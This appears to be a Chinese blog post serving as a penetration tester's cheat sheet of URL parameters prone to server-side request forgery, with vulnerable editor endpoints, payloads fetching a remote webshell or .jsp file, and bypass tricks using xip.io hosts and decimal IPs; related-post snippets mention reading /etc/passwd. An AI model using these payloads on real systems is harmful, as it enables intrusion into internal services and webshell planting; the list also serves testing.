URL中与SSRF相关的字段

最新推荐文章于 2022-11-10 16:27:32 发布
最新推荐文章于 2022-11-10 16:27:32 发布
阅读量413 收藏 1
点赞数 1
分类专栏: python学习 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u013224189/article/details/86325763
版权

URL中与SSRF相关的字段

	relativePath
	url
	site
	path
	message=[img]http://myserver/wshell.php?logo.jpg[/img]
	query
	src
	src_url
	sr
	id
	vtTopicId  //ebs
	operator(weblogic:SearchPublicRegistries)
	inputFile
	column_url
	preview
	sIconUrl/sUrl
	picPath
	qrcodeUrl
	fileName
	upfile(ueditor/jsp/getRemoteImage.jsp?upfile=http://**.**.**.**/sex.jsp%23.jpg)
	img
	source
	pageurl
	redirect
	Ueditor  imageUp.jsp  controller.php getRemoteImage.jsp  source[] upfile
	ewebeditr  eWebEditor_UploadText
	xheditor  saveremoteimg
	proxy?s=
	view_img.php
	imgurl
	link
	href
	apiurl
	resourceUrl
	
	SSRF绕过:
		http://10.13.199.124.xip.io:8080
		www.127.0.0.1.xip.io
		http://168675196:8080  可以将IP转换为10进制绕过
u013224189
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SSRF 漏洞记录
发哥微课堂
04-02 1万+
0x00:漏洞原理 SSRF(Server-Side Request Forgery)也属于应用层上的一个漏洞类型,用一个最简单的例子来理解这个漏洞:比如一个添加图文的功能,填入标题内容和封面图然后提交在网站前台显示,对于这个功能的图片它除了可以让你上传以外,还支持填入远程图片地址,如果你填入了远程的图片地址,则该网站会加载远程图过来进行显示,而如果程序写法不严谨或者过滤不严格,则加载图片地址的...
第一节 SSRF原理介绍-01
09-15
这个示例代码,curl函数用来发送请求用户通过构造url来进行访问。如果攻击者构造了一个恶意的url,例如file:///etc/passwd,服务端就会将/etc/passwd文件的内容发送回客户端,从而导致敏感信息的泄露。 SSRF漏洞...
ssrf漏洞url编码解码
qq_42303523的博客
04-06 1289
http协议和gopher协议的编码解码过程 http协议 当我们输入“http://ip:host/xxx”时,浏览器会向ip:host发送http请求。如果“xxx”含有“%xx”格式的内容,http协议会原封不动地发送给接收方,接收方在提取出参数之后再将参数的“%xx”解码。 举例来说,如果我们访问“http://127.0.0.1/index.php?a=%26&b=123”,服务器接受到的报文含有字符串“?a=%26&b=123”,然后服务器提取出参数a是“%26”,参数b是
SSRF、URL跳转Bypass
Ju0se
12-05 2078
  http://google.com:80+&@127.88.23.245:22/#+@google.com:80/ http://127.88.23.245:22/+&@google.com:80#+@google.com:80/ http://google.com:80+&@google.com:80#+@127.88.23.245:22/ http://1...
SSRF归拢
superprintf的博客
02-05 1043
了解SSRF,这一篇就足够了 [WEB安全]SSRFURL的伪协议
pikachu靶场 URL重定向、SSRF
Al_1的博客
10-06 519
URL重定向,服务端请求伪造
红蓝对抗SSRF深入利用实战.pdf
08-11
安全趋势 概述 SSRF简介 利用现状 利用困境 实战分享 Case 1 Case 2 Case 3
你未见过的SSRF利用方式
06-20
服务器端请求伪造) 是⼀种由攻击者构造形成,由服务端发起请求的⼀个安全漏洞 原因是由于服务端提供了从其他服务器应⽤获取数据的功能且没有对地址和协议等做过滤和限制 本⽂讲解⼀个ssrf的挖掘⽅法与⼀个全回显ssrf...
WebLogic SSRF 及漏洞修复
11-25
该漏洞主要出现在版本10.0.2和10.3.6的`SearchPublicRegistries.jsp`页面,该页面存在不当的用户输入验证机制,使得攻击者可以通过构造恶意URL来触发SSRF攻击。 **2. 攻击原理** - **构造恶意URL**: 攻击者可以...
SSRF(通过时间判断) 点击保存头像,开启burpsuite抓包
最新发布
10-07
在普通的SSRF攻击,攻击者可以直接观察服务器返回的数据来判断请求是否成功。然而,在盲SSRF,由于服务器不会返回具体的结果,比如HTTP响应状态码或响应内容,攻击者只能通过间接方式,如请求时间延迟,来判断...
pikachu练习—XXE/URL重定向/SSRF
ptxybird的博客
07-07 960
pikachu练习—XXE/URL重定向/SSRF
SSRF 漏洞的寻找
WHACKW的专栏
01-04 5471
SSRF 漏洞的寻找 一、从WEB功能上寻找 我们从上面的概述可以看出,SSRF是由于服务端获取其他服务器的相关信息的功能形成的,因此我们大可以列举几种在web 应用常见的从服务端获取其他服务器信息的的功能。 1)分享:通过URL地址分享网页内容 早期分享应用,为了更好的提供用户体验,WEB应用在分享功能,通常会获取目标URL地址网页内容的标签或者标签content的文本内容作
渗透测试学习21:SSRF和URL重定向bypass
weixin_44315099的博客
03-15 1907
目录
SSRF漏洞
F2444790591的博客
06-19 678
SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。SSRF的形成大多是由于服务端提供了从其他服务器应用获取数据的功能且没有对目标地址做过滤与限制。如,黑客操作服务端从指定URL地址获取网页文本内容,加载指定地址的图片等,利用的是服务端的请求伪造。SSRF利用存在缺陷的Web 应用作为代理攻击远程和本地的服务器。 curl_exec()
URL?和#的区别(关于SSRF)以及mysql的secure-file-priv
weixin_30724853的博客
01-25 247
零,绪论 20180125日,忙! 瞎比比总结一下,来满足这是个日记的样子。 1、今天谈的并不是什么技术【当然也不是没有技术(都很基础)】而是瞎几把扯。 一、关于一种SSRF的检测绕过: 1、背景:   有这样一种情况在集登录认证的web页面一般url后面会跟一个next=https://aaa.bbcc.com/index/xxx/index.html这个位置很容易发生SSRF。但仔...
SSRF学习笔记
星落
11-10 512
小谈SSRF(服务端请求伪造)
SSRF相关知识点总结
since_2020的博客
08-20 591
SSRF(Server-Side Request Forgery)服务端请求为伪造 一、容易产生SSRF漏洞的函数 file_get_contents()、fsockopen()、curl_exec() 1、file_get_contents() 该函数的作用是将整个文件读入一个字符串 <?php if(isset($_POST['url'])) { $content=file_get_contents($_POST['url']); $filen
SSRFURL的伪协议
m0_55754984的博客
09-10 2040
当我们发现SSRF漏洞后,首先要做的事情就是测试所有可用的URL伪协议 0x01 类型 file:/// dict:// sftp:// ldap:// tftp:// gopher:// file:// 这种URL Schema可以尝试从文件系统获取文件: http://example.com/ssrf.php?url=file:///etc/passwdhttp://example.com/ssrf.php?url=file:///C:/Windows/win.ini 如果该服务器
SSRF漏洞的利用与学习
3569
02-22 8086
http://uknowsec.cn/posts/notes/SSRF%E6%BC%8F%E6%B4%9E%E7%9A%84%E5%88%A9%E7%94%A8%E4%B8%8E%E5%AD%A6%E4%B9%A0.html漏洞简介SSRF(Server-side Request Forge, 服务端请求伪造)。由攻击者构造的攻击链接传给服务端执行造成的漏洞,一般用来在外网探测或攻击内网服务。漏洞...
pikachussrf
09-14
文章提到了两种主要的SSRF漏洞形式:SSRF(URL)和SSRF(file_get_contents)。 在SSRF(URL,攻击者可以利用不受信任的输入构造URL,通过服务器发起对外部资源的请求。这种漏洞可以导致攻击者访问内部网络、...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值